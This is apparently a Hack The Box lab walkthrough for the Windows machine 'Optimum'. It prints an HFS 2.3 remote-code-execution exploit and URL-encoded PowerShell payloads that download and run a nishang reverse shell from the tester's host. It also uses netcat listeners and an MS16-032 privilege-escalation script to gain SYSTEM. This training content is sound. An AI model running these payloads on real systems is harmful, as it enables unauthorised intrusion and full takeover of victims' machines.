IP
initial nmap scan
Copy nmap -p- --min-rate 10000 10.10.10.8 | cut -d"/" -f1 | tr '\n' ',' we have the following ports open on the target
Lets run a more in-depth scan of the target machine
Copy sudo nmap -sCV -p80 10.10.10.8 -oA nmap_results Results
Copy PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Looks like we have a file server up and running on the target Lets check it out
we can see
using searchsploit we can see this particular version is likely vulnerable to RCE
we will be able to see different methods of RCE with this specific version of rejetto
One we bring down the following
Copy searchsploit -m windows/webapps/49125.py and we print out the exploit we can see the following
Copy # Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
print(url)
response = http.request('GET', url)
except Exception as ex:
print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
print(ex) Once given a command for RCE, the exploit will encode our command using the (urllib.parse.quote function) in the URL query with the search parameter, we can do this without the exploit
To test this we will run tcpdump on our machine and have the target ping us
running tcpdump on local machine
Lets use the target machine to ping ourselfs
we can see traffic generated from the IP 10.10.10.8 within tcpdump
Now all thats left is to gain a reverse shell on the target
Lets utilize a Powershell script
Lets copy our nishang shell into our current working directory
Copy cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./ let's modify it slightly to run once to has been picked up by the target
we can see we execute the powershell function to connect back to our local machine
Alright Now we have a our payload ready, lets pick it up and run it on our target machine
Copy python3 -m http.server 80
Copy rlwrap -cAr nc -lvnp 9001 Lets craft our command to pick up the script and run it, for ease we will utilize burps repeater
Copy search=%00{.exec|c%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http%3a//10.10.14.28/Invoke-PowerShellTcp.ps1').} Notice our payload is URL encoded
we specified full path of the Powershell.exe
Now we have a shell on the system
Lets grab information on the system and see if we can find any Priv Esc exploits
results
Copy Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 3/1/2024, 11:04:07 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.471 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.923 MB
Virtual Memory: In Use: 580 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. Lets utilize wes-ng to find any exploits that may be present on the system,
first lets update wes-ng
Copy sudo /opt/wesng/wes.py --update Now Let's place all the system information we found into a Txt file and run wes against it
Copy sudo /opt/wesng/wes.py systeminfo > possible_exploits this will produce a list of possible exploits on the system
We could also utilise sherlock.ps1 from rasta mouse
Lets download sherlock.ps1 onto the target machine
we want to make some slight modifications to the script as we just want to find vulnerabilities on the machine, to do this we make a slight addition to the bottom of the script
start a python3 http server
Copy python3 -m http.server 80 within our shell lets download it onto the target machine
Copy IEX(New-Object Net.WebClient).downloadString('http://10.10.14.28:80/Sherlock.ps1') we can see we now have Sherlocks output
results
Copy Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Appears Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
tml
VulnStatus : Not Vulnerable
from the results we can assume this machine is vulnerable to
Copy MS16-135, MS16-034, MS16-032 We can utilise MS16-032 using Powershell empire
clone Empire
within the data/module_source/privesc we can see Invoke-MS16032.ps1
Lets copy the powershell script to our working directory
Copy sudo cp Invoke-MS16032.ps1 ~/Desktop/HTB/windows/optimum/exploits Lets slightly modify the script to run once downloaded
we want it to
it will pick up our nishang shell again which we modified to connect to port 9010
Copy rlwrap -cAr nc -lvnp 9010 start a python3 http server
Copy python3 -m http.server 9005 download and run on target
Copy IEX(New-Object Net.WebClient).downloadString('http://10.10.14.28:80/Invoke-MS16032.ps1') when we check our other shell we should see we are nt authority/system
